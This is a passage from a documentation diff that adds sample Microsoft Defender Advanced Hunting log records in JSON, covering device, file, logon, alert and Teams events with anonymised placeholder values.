"ParticipantInfo": { + "HasForeignTenantUsers": false, + "HasGuestUsers": false, + "HasOtherGuestUsers": false, + "HasUnauthenticatedUsers": false, + "ParticipatingDomains": [], + "ParticipatingSIPDomains": [], + "ParticipatingTenantIds": [ + "12345678-abcd-ef09-1234-123456abcdef" + ] + }, + "RecordType": 25, + "ResourceTenantId": "12345678-abcd-ef09-1234-123456abcdef", + "UserId": "john.doe@company.fr", + "UserKey": "abcd1234-1234-1234-1234-abcdef123456", + "UserType": 0, + "Version": 1, + "Workload": "MicrosoftTeams" + }, + "ReportId": "98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef", + "Timestamp": "2024-10-28T14:18:38Z", + "Application": "Microsoft Teams" + }, + "Tenant": "DefaultTenant" + } + ``` + + + === "test_connection_acknowledged" 
@@ -748,7 +841,188 @@ In this section, you will find examples of raw logs as generated natively by the -=== "test_deivce_events_2" +=== "test_detection_source" + + + ```json + { + "time": "2022-09-02T22:06:00.6652718Z", + "tenantId": "16ed4fbf-027f-47b3-8d1a-a342781dd2d2", + "operationName": "Publish", + "category": "AdvancedHunting-AlertInfo", + "properties": { + "AlertId": "da637977531594995313_968283104", + "Timestamp": "2022-09-02T22:04:16.134644Z", + "Title": "'Lodi' unwanted software was prevented", + "ServiceSource": "Microsoft Defender for Endpoint", + "Category": "DefenseEvasion", + "Severity": "Informational", + "DetectionSource": "Antivirus", + "MachineGroup": "Windows 10 - remediate threats automatically", + "AttackTechniques": "" + } + } + ``` + + + +=== "test_device_event" + + + ```json + { + "time": "2022-09-01T07:28:59.5127177Z", + "tenantId": "5ac3ff49-0e19-4600-9ad1-333e64e3b5cc", + "operationName": "Publish", + "category": "AdvancedHunting-DeviceEvents", + "properties": { + "AccountSid": null, + "AccountDomain": null, + "AccountName": null, + "LogonId": null, + "FileName": null, + "FolderPath": null, + "MD5": null, + "SHA1": null, + "FileSize": null, + "SHA256": null, + "ProcessCreationTime": null, + "ProcessTokenElevation": null, + "RemoteUrl": null, + "RegistryKey": null, + "RegistryValueName": null, + "RegistryValueData": null, + "RemoteDeviceName": null, + "FileOriginIP": null, + "FileOriginUrl": null, + "LocalIP": "1.2.3.4", + "LocalPort": null, + "RemoteIP": "5.6.7.8", + "RemotePort": null, + "ProcessId": null, + "ProcessCommandLine": null, + "AdditionalFields": "{\"BaseAddress\":2098738167808,\"RegionSize\":262144,\"ProtectionMask\":64}", + "ActionType": "NtAllocateVirtualMemoryApiCall", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200", + "InitiatingProcessVersionInfoInternalFileName": 
"software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessFolderPath": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe", + "InitiatingProcessFileName": "software_reporter_tool.exe", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee", + "InitiatingProcessSHA256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "InitiatingProcessSHA1": "44543e0c6f30415c670c1322e61ca68602d58708", + "InitiatingProcessLogonId": 121834210, + "InitiatingProcessAccountSid": "S-1-00-1-1111111-2222222222-3333333333-4444444444", + "InitiatingProcessAccountDomain": "intranet", + "InitiatingProcessAccountName": "group1", + "InitiatingProcessAccountUpn": "user@example.org", + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCreationTime": "2022-09-01T06:56:23.7887846Z", + "InitiatingProcessId": 1664, + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessParentCreationTime": "2022-09-01T06:56:23.595229Z", + "InitiatingProcessParentId": 15532, + "InitiatingProcessParentFileName": "software_reporter_tool.exe", + "DeviceId": "1111111111111111111111111111111111111111", + "AppGuardContainerId": "", + "MachineGroup": "UnassignedGroup", + "Timestamp": "2022-09-01T07:09:47.4980566Z", + "DeviceName": "test.lab", + "ReportId": 104061 + } + } + ``` + + + +=== "test_device_event_sensitive_file_read" + + + ```json + { + "time": "2024-11-12T10:18:48.4363168Z", + "tenantId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "operationName": "Publish", + 
"category": "AdvancedHunting-DeviceEvents", + "_TimeReceivedBySvc": "2024-11-12T10:18:28.1484017Z", + "properties": { + "DeviceId": "abcdef0123456789", + "DeviceName": "user.company.local", + "ReportId": 73291, + "InitiatingProcessId": 1328, + "InitiatingProcessCreationTime": "2024-11-12T10:17:23.9905327Z", + "InitiatingProcessCommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "InitiatingProcessParentFileName": "Windows.exe", + "InitiatingProcessParentId": 1820, + "InitiatingProcessParentCreationTime": "2024-10-14T05:47:54.3243814Z", + "InitiatingProcessSHA1": "44543e0c6f30415c670c1322e61ca68602d58708", + "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee", + "InitiatingProcessFileName": "browser.exe", + "InitiatingProcessFolderPath": "c:\\program files (x86)\\browser.exe", + "InitiatingProcessAccountName": "username", + "InitiatingProcessAccountDomain": "company", + "SHA1": null, + "MD5": null, + "FileName": "FileName.mdb", + "FolderPath": "C:\\Log", + "AccountName": null, + "AccountDomain": null, + "AdditionalFields": null, + "InitiatingProcessAccountSid": "S-1-2-3", + "AppGuardContainerId": "", + "InitiatingProcessSHA256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "SHA256": null, + "RemoteUrl": null, + "ProcessCreationTime": null, + "ProcessTokenElevation": null, + "ActionType": "SensitiveFileRead", + "FileOriginUrl": null, + "FileOriginIP": null, + "InitiatingProcessLogonId": 5223047, + "AccountSid": "S-1-2-3", + "RemoteDeviceName": null, + "RegistryKey": null, + "RegistryValueName": null, + "RegistryValueData": null, + "LogonId": null, + "LocalIP": null, + "LocalPort": null, + "RemoteIP": null, + "RemotePort": null, + "ProcessId": null, + "ProcessCommandLine": null, + "InitiatingProcessAccountUpn": "USERNAME@COMPANY.COM", + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "FileSize": 286720, + "InitiatingProcessFileSize": 
3316224, + "InitiatingProcessVersionInfoCompanyName": "Test Corporation", + "InitiatingProcessVersionInfoProductName": "Test Product", + "InitiatingProcessVersionInfoProductVersion": "1, 0, 0, 1", + "InitiatingProcessVersionInfoInternalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoOriginalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoFileDescription": "Browser EXE", + "InitiatingProcessSessionId": 1, + "IsInitiatingProcessRemoteSession": false, + "InitiatingProcessRemoteSessionDeviceName": null, + "InitiatingProcessRemoteSessionIP": null, + "CreatedProcessSessionId": null, + "IsProcessRemoteSession": false, + "ProcessRemoteSessionDeviceName": null, + "ProcessRemoteSessionIP": null, + "Timestamp": "2024-11-12T10:17:24.8588296Z", + "MachineGroup": "PC" + }, + "Tenant": "DefaultTenant" + } + ``` + + + +=== "test_device_events_2" ```json 
@@ -831,99 +1105,250 @@ In this section, you will find examples of raw logs as generated natively by the -=== "test_detection_source" +=== "test_device_events_get_clipboard_data" ```json { - "time": "2022-09-02T22:06:00.6652718Z", - "tenantId": "16ed4fbf-027f-47b3-8d1a-a342781dd2d2", + "time": "2024-11-12T09:49:58.3460812Z", + "tenantId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", "operationName": "Publish", - "category": "AdvancedHunting-AlertInfo", + "category": "AdvancedHunting-DeviceEvents", + "_TimeReceivedBySvc": "2024-11-12T09:49:02.3098089Z", "properties": { - "AlertId": "da637977531594995313_968283104", - "Timestamp": "2022-09-02T22:04:16.134644Z", - "Title": "'Lodi' unwanted software was prevented", - "ServiceSource": "Microsoft Defender for Endpoint", - "Category": "DefenseEvasion", - "Severity": "Informational", - "DetectionSource": "Antivirus", - "MachineGroup": "Windows 10 - remediate threats automatically", - "AttackTechniques": "" - } + "DeviceId": "abcdef0123456789", + "DeviceName": "device.company.fr", + "ReportId": 157950, + "InitiatingProcessId": 12824, + "InitiatingProcessCreationTime": "2024-11-12T10:09:31.1004556Z", + "InitiatingProcessCommandLine": "\"OUTLOOK.EXE\" ", + "InitiatingProcessParentFileName": "exec.exe", + "InitiatingProcessParentId": 18840, + "InitiatingProcessParentCreationTime": "2024-11-12T08:44:15.1503958Z", + "InitiatingProcessSHA1": "44543e0c6f30415c670c1322e61ca68602d58708", + "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee", + "InitiatingProcessFileName": "outlook.exe", + "InitiatingProcessFolderPath": "c:\\program files\\microsoft office\\root\\outlook.exe", + "InitiatingProcessAccountName": "john.doe", + "InitiatingProcessAccountDomain": "account-domain", + "SHA1": null, + "MD5": null, + "FileName": null, + "FolderPath": null, + "AccountName": null, + "AccountDomain": null, + "AdditionalFields": null, + "InitiatingProcessAccountSid": "S-1-2-3", + "AppGuardContainerId": "", + "InitiatingProcessSHA256": 
"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "SHA256": null, + "RemoteUrl": null, + "ProcessCreationTime": null, + "ProcessTokenElevation": null, + "ActionType": "GetClipboardData", + "FileOriginUrl": null, + "FileOriginIP": null, + "InitiatingProcessLogonId": 389220681, + "AccountSid": null, + "RemoteDeviceName": null, + "RegistryKey": null, + "RegistryValueName": null, + "RegistryValueData": null, + "LogonId": null, + "LocalIP": null, + "LocalPort": null, + "RemoteIP": null, + "RemotePort": null, + "ProcessId": null, + "ProcessCommandLine": null, + "InitiatingProcessAccountUpn": "john.doe@account-domain.fr", + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "FileSize": null, + "InitiatingProcessFileSize": 44152968, + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoProductName": "Microsoft Outlook", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216", + "InitiatingProcessVersionInfoInternalFileName": "Outlook", + "InitiatingProcessVersionInfoOriginalFileName": "Outlook.exe", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Outlook", + "InitiatingProcessSessionId": 12, + "IsInitiatingProcessRemoteSession": false, + "InitiatingProcessRemoteSessionDeviceName": null, + "InitiatingProcessRemoteSessionIP": null, + "CreatedProcessSessionId": null, + "IsProcessRemoteSession": false, + "ProcessRemoteSessionDeviceName": null, + "ProcessRemoteSessionIP": null, + "Timestamp": "2024-11-12T10:19:26.5027772Z", + "MachineGroup": "All_Win10_11" + }, + "Tenant": "DefaultTenant" } ``` -=== "test_device_event" +=== "test_device_events_powershell_command" ```json { - "time": "2022-09-01T07:28:59.5127177Z", - "tenantId": "5ac3ff49-0e19-4600-9ad1-333e64e3b5cc", + "time": "2024-11-12T10:18:46.3194193Z", + "tenantId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", "operationName": "Publish", "category": "AdvancedHunting-DeviceEvents", + "_TimeReceivedBySvc": 
"2024-11-12T10:17:19.1406475Z", "properties": { - "AccountSid": null, - "AccountDomain": null, - "AccountName": null, - "LogonId": null, + "DeviceId": "abcdef0123456789", + "DeviceName": "device.name.fr", + "ReportId": 134294, + "InitiatingProcessId": 27568, + "InitiatingProcessCreationTime": "2024-11-12T10:15:16.4871111Z", + "InitiatingProcessCommandLine": "powershell.exe", + "InitiatingProcessParentFileName": "WindowsTerminal.exe", + "InitiatingProcessParentId": 884, + "InitiatingProcessParentCreationTime": "2024-11-12T09:20:42.8246765Z", + "InitiatingProcessSHA1": "44543e0c6f30415c670c1322e61ca68602d58708", + "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee", + "InitiatingProcessFileName": "powershell.exe", + "InitiatingProcessFolderPath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "InitiatingProcessAccountName": "jdoe", + "InitiatingProcessAccountDomain": "domain", + "SHA1": null, + "MD5": null, "FileName": null, "FolderPath": null, - "MD5": null, - "SHA1": null, - "FileSize": null, + "AccountName": null, + "AccountDomain": null, + "AdditionalFields": "{\"Command\":\"nslookup.exe user01-domain.USER01.local 1.2.3.4\"}", + "InitiatingProcessAccountSid": "S-1-2-3", + "AppGuardContainerId": "", + "InitiatingProcessSHA256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", "SHA256": null, + "RemoteUrl": null, "ProcessCreationTime": null, "ProcessTokenElevation": null, - "RemoteUrl": null, + "ActionType": "PowerShellCommand", + "FileOriginUrl": null, + "FileOriginIP": null, + "InitiatingProcessLogonId": 398124703, + "AccountSid": null, + "RemoteDeviceName": null, "RegistryKey": null, "RegistryValueName": null, "RegistryValueData": null, - "RemoteDeviceName": null, - "FileOriginIP": null, - "FileOriginUrl": null, - "LocalIP": "1.2.3.4", + "LogonId": null, + "LocalIP": null, "LocalPort": null, - "RemoteIP": "5.6.7.8", + "RemoteIP": null, "RemotePort": null, "ProcessId": null, "ProcessCommandLine": null, - 
"AdditionalFields": "{\"BaseAddress\":2098738167808,\"RegionSize\":262144,\"ProtectionMask\":64}", - "ActionType": "NtAllocateVirtualMemoryApiCall", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessFolderPath": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe", - "InitiatingProcessFileName": "software_reporter_tool.exe", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee", - "InitiatingProcessSHA256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "InitiatingProcessAccountUpn": "JDOE@domain.fr", + "InitiatingProcessAccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + "FileSize": null, + "InitiatingProcessFileSize": 450560, + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "10.0.22621.3085", + "InitiatingProcessVersionInfoInternalFileName": "POWERSHELL", + "InitiatingProcessVersionInfoOriginalFileName": "PowerShell.EXE", + "InitiatingProcessVersionInfoFileDescription": "Windows PowerShell", + "InitiatingProcessSessionId": 6, + "IsInitiatingProcessRemoteSession": false, + "InitiatingProcessRemoteSessionDeviceName": null, + "InitiatingProcessRemoteSessionIP": null, + "CreatedProcessSessionId": null, + "IsProcessRemoteSession": false, + "ProcessRemoteSessionDeviceName": null, + "ProcessRemoteSessionIP": null, + "Timestamp": "2024-11-12T10:15:59.5508823Z", + "MachineGroup": 
"UnassignedGroup"
+ },
+ "Tenant": "DefaultTenant"
+ }
+ ```
+
+
+=== "test_device_events_shell_link_create_file"
+
+
+ ```json
+ {
+ "time": "2024-11-12T10:18:30.9849876Z",
+ "tenantId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
+ "operationName": "Publish",
+ "category": "AdvancedHunting-DeviceEvents",
+ "_TimeReceivedBySvc": "2024-11-12T10:18:00.0874785Z",
+ "properties": {
+ "DeviceId": "abcdef0123456789",
+ "DeviceName": "user.company.local",
+ "ReportId": 22722,
+ "InitiatingProcessId": 20948,
+ "InitiatingProcessCreationTime": "2024-11-12T10:02:28.7779103Z",
+ "InitiatingProcessCommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
+ "InitiatingProcessParentFileName": "explorer.exe",
+ "InitiatingProcessParentId": 14616,
+ "InitiatingProcessParentCreationTime": "2024-11-12T08:47:41.9520775Z",
 "InitiatingProcessSHA1": "44543e0c6f30415c670c1322e61ca68602d58708",
- "InitiatingProcessLogonId": 121834210,
- "InitiatingProcessAccountSid": "S-1-00-1-1111111-2222222222-3333333333-4444444444",
- "InitiatingProcessAccountDomain": "intranet",
- "InitiatingProcessAccountName": "group1",
- "InitiatingProcessAccountUpn": "user@example.org",
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCreationTime": "2022-09-01T06:56:23.7887846Z",
- "InitiatingProcessId": 1664,
- "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "InitiatingProcessParentCreationTime": "2022-09-01T06:56:23.595229Z",
- "InitiatingProcessParentId": 15532,
- "InitiatingProcessParentFileName": "software_reporter_tool.exe",
- "DeviceId": "1111111111111111111111111111111111111111",
+ "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee",
+ "InitiatingProcessFileName": "winword.exe",
+ 
"InitiatingProcessFolderPath": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe",
+ "InitiatingProcessAccountName": "jdoe",
+ "InitiatingProcessAccountDomain": "company",
+ "SHA1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e",
+ "MD5": "5d5608654828cf052ba013b3c37cbb61",
+ "FileName": "FILENAME.LNK",
+ "FolderPath": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office\\Recent",
+ "AccountName": null,
+ "AccountDomain": null,
+ "AdditionalFields": "{\"FileSizeInBytes\":914,\"VolumeGuidPath\":\"\\\\\\\\?\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\",\"IsOnRemovableMedia\":false,\"ShellLinkRunAsAdmin\":false,\"ShellLinkShowCommand\":\"SW_SHOWNORMAL\"}",
+ "InitiatingProcessAccountSid": "S-1-2-3",
 "AppGuardContainerId": "",
- "MachineGroup": "UnassignedGroup",
- "Timestamp": "2022-09-01T07:09:47.4980566Z",
- "DeviceName": "test.lab",
- "ReportId": 104061
- }
+ "InitiatingProcessSHA256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323",
+ "SHA256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232",
+ "RemoteUrl": null,
+ "ProcessCreationTime": "2024-11-06T16:05:23.1138023Z",
+ "ProcessTokenElevation": null,
+ "ActionType": "ShellLinkCreateFileEvent",
+ "FileOriginUrl": null,
+ "FileOriginIP": null,
+ "InitiatingProcessLogonId": 8066492,
+ "AccountSid": null,
+ "RemoteDeviceName": null,
+ "RegistryKey": null,
+ "RegistryValueName": null,
+ "RegistryValueData": null,
+ "LogonId": null,
+ "LocalIP": null,
+ "LocalPort": null,
+ "RemoteIP": null,
+ "RemotePort": null,
+ "ProcessId": null,
+ "ProcessCommandLine": null,
+ "InitiatingProcessAccountUpn": "JOHNDOE@COMPANY.COM",
+ "InitiatingProcessAccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456",
+ "FileSize": null,
+ "InitiatingProcessFileSize": 1621656,
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoProductName": "Microsoft Office",
+ "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216",
+ 
"InitiatingProcessVersionInfoInternalFileName": "WinWord",
+ "InitiatingProcessVersionInfoOriginalFileName": "WinWord.exe",
+ "InitiatingProcessVersionInfoFileDescription": "Microsoft Word",
+ "InitiatingProcessSessionId": 1,
+ "IsInitiatingProcessRemoteSession": false,
+ "InitiatingProcessRemoteSessionDeviceName": null,
+ "InitiatingProcessRemoteSessionIP": null,
+ "CreatedProcessSessionId": null,
+ "IsProcessRemoteSession": false,
+ "ProcessRemoteSessionDeviceName": null,
+ "ProcessRemoteSessionIP": null,
+ "Timestamp": "2024-11-12T10:17:23.3307226Z",
+ "MachineGroup": "UnassignedGroup"
+ },
+ "Tenant": "DefaultTenant"
 }
 ```
@@ -1034,6 +1459,82 @@ In this section, you will find examples of raw logs as generated natively by the
+=== "test_device_file_event_02"
+
+
+ ```json
+ {
+ "time": "2024-11-08T14:42:24.2882642Z",
+ "tenantId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
+ "operationName": "Publish",
+ "category": "AdvancedHunting-DeviceFileEvents",
+ "_TimeReceivedBySvc": "2024-11-08T14:41:06.9726687Z",
+ "properties": {
+ "SHA1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264",
+ "FileSize": 640920,
+ "MD5": "9a3af3a9ce0217bccce1d161e0b6bfde",
+ "FileName": "FileName.dll",
+ "FolderPath": "C:\\Program Files\\FileName.dll",
+ "InitiatingProcessCommandLine": "commandexec.exe /V",
+ "InitiatingProcessFileName": "commandexec.exe",
+ "InitiatingProcessParentFileName": "services.exe",
+ "InitiatingProcessSHA1": "44543e0c6f30415c670c1322e61ca68602d58708",
+ "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee",
+ "InitiatingProcessFolderPath": "c:\\windows\\system32\\commandexec.exe",
+ "InitiatingProcessParentCreationTime": "2024-10-09T01:02:27.2227081Z",
+ "InitiatingProcessId": 16468,
+ "DeviceName": "device.company.local",
+ "DeviceId": "123456789abcdef",
+ "InitiatingProcessCreationTime": "2024-11-08T14:38:23.2383083Z",
+ "InitiatingProcessAccountName": "syst\u00e8me",
+ "InitiatingProcessAccountDomain": "account domain",
+ "InitiatingProcessAccountSid": "S-1-2-3",
+ "InitiatingProcessParentId": 888,
+ "ReportId": 341972,
+ "SHA256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595",
+ "InitiatingProcessIntegrityLevel": "System",
+ "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+ "FileOriginUrl": null,
+ "FileOriginIP": null,
+ "FileOriginReferrerUrl": null,
+ "AppGuardContainerId": "",
+ "ActionType": "FileCreated",
+ "SensitivityLabel": null,
+ "SensitivitySubLabel": null,
+ "IsAzureInfoProtectionApplied": null,
+ "RequestProtocol": "Local",
+ "ShareName": null,
+ "RequestSourceIP": null,
+ "RequestSourcePort": null,
+ "RequestAccountName": 
"Syst\u00e8me",
+ "RequestAccountDomain": "ACCOUNT DOMAIN",
+ "RequestAccountSid": "S-1-2-3",
+ "InitiatingProcessSHA256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323",
+ "InitiatingProcessAccountUpn": null,
+ "InitiatingProcessAccountObjectId": null,
+ "AdditionalFields": "{\"FileType\":\"PortableExecutable\"}",
+ "PreviousFolderPath": "",
+ "PreviousFileName": "",
+ "InitiatingProcessFileSize": 176128,
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode",
+ "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880",
+ "InitiatingProcessVersionInfoInternalFileName": "commandexec",
+ "InitiatingProcessVersionInfoOriginalFileName": "commandexec.exe",
+ "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer",
+ "InitiatingProcessSessionId": 0,
+ "IsInitiatingProcessRemoteSession": false,
+ "InitiatingProcessRemoteSessionDeviceName": null,
+ "InitiatingProcessRemoteSessionIP": null,
+ "Timestamp": "2024-11-08T14:38:51.9048761Z",
+ "MachineGroup": null
+ },
+ "Tenant": "DefaultTenant"
+ }
+ ```
+
+
+
 === "test_device_image_load_event"
@@ -1238,6 +1739,73 @@ In this section, you will find examples of raw logs as generated natively by the
+=== "test_device_logon_failed"
+
+
+ ```json
+ {
+ "time": "2024-11-18T10:08:29.9147832Z",
+ "tenantId": "12345678-abcd-ef09-1234-123456abcdef",
+ "operationName": "Publish",
+ "category": "AdvancedHunting-DeviceLogonEvents",
+ "_TimeReceivedBySvc": "2024-11-18T10:07:35.3397350Z",
+ "properties": {
+ "AccountName": "account",
+ "AccountDomain": "domain",
+ "LogonType": "Network",
+ "DeviceName": "domain",
+ "DeviceId": "1111111111111111111111111111111111111111",
+ "ReportId": 413706,
+ "AccountSid": null,
+ "AppGuardContainerId": null,
+ "LogonId": null,
+ "RemoteIP": "1.2.3.4",
+ "RemotePort": null,
+ "RemoteDeviceName": null,
+ "ActionType": "LogonFailed",
+ "InitiatingProcessId": 3653343,
+ "InitiatingProcessCreationTime": "2024-11-18T10:07:20.29393Z",
+ "InitiatingProcessFileName": "sshd",
+ "InitiatingProcessFolderPath": "/usr/sbin/sshd",
+ "InitiatingProcessSHA1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e",
+ "InitiatingProcessSHA256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232",
+ "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee",
+ "InitiatingProcessCommandLine": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 
-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R",
+ "InitiatingProcessAccountName": "root",
+ "InitiatingProcessAccountDomain": "domain",
+ "InitiatingProcessAccountSid": null,
+ "InitiatingProcessTokenElevation": "None",
+ "InitiatingProcessIntegrityLevel": null,
+ "InitiatingProcessParentId": 3653343,
+ "InitiatingProcessParentCreationTime": "2024-11-18T10:07:20.29Z",
+ "InitiatingProcessParentFileName": "sshd",
+ "AdditionalFields": "{\"PosixUserId\":1301,\"PosixPrimaryGroupName\":\"account\",\"PosixPrimaryGroupId\":500,\"PosixSecondaryGroups\":\"[{\\\"Name\\\":\\\"users\\\",\\\"PosixGroupId\\\":100},{\\\"Name\\\":\\\"exploitation\\\",\\\"PosixGroupId\\\":1202}]\",\"InitiatingAccountName\":\"root\",\"InitiatingAccountDomain\":\"domain\",\"InitiatingAccountPosixUserId\":0,\"InitiatingAccountPosixGroupName\":\"mdatp\",\"InitiatingAccountPosixGroupId\":595}",
+ "RemoteIPType": "Private",
+ "IsLocalAdmin": null,
+ "InitiatingProcessAccountUpn": null,
+ "InitiatingProcessAccountObjectId": null,
+ "Protocol": null,
+ "FailureReason": null,
+ "InitiatingProcessFileSize": 890528,
+ "InitiatingProcessVersionInfoCompanyName": null,
+ 
"InitiatingProcessVersionInfoProductName": null,
+ "InitiatingProcessVersionInfoProductVersion": null,
+ "InitiatingProcessVersionInfoInternalFileName": null,
+ "InitiatingProcessVersionInfoOriginalFileName": null,
+ "InitiatingProcessVersionInfoFileDescription": null,
+ "InitiatingProcessSessionId": null,
+ "IsInitiatingProcessRemoteSession": false,
+ "InitiatingProcessRemoteSessionDeviceName": null,
+ "InitiatingProcessRemoteSessionIP": null,
+ "Timestamp": "2024-11-18T10:07:22.681617Z",
+ "MachineGroup": "Linux Servers - remediate threats automatically"
+ },
+ "Tenant": "DefaultTenant"
+ }
+ ```
+
+
+
 === "test_device_network_connection"
@@ -1809,6 +2377,116 @@ In this section, you will find examples of raw logs as generated natively by the
+=== "test_email_delivered"
+
+
+ ```json
+ {
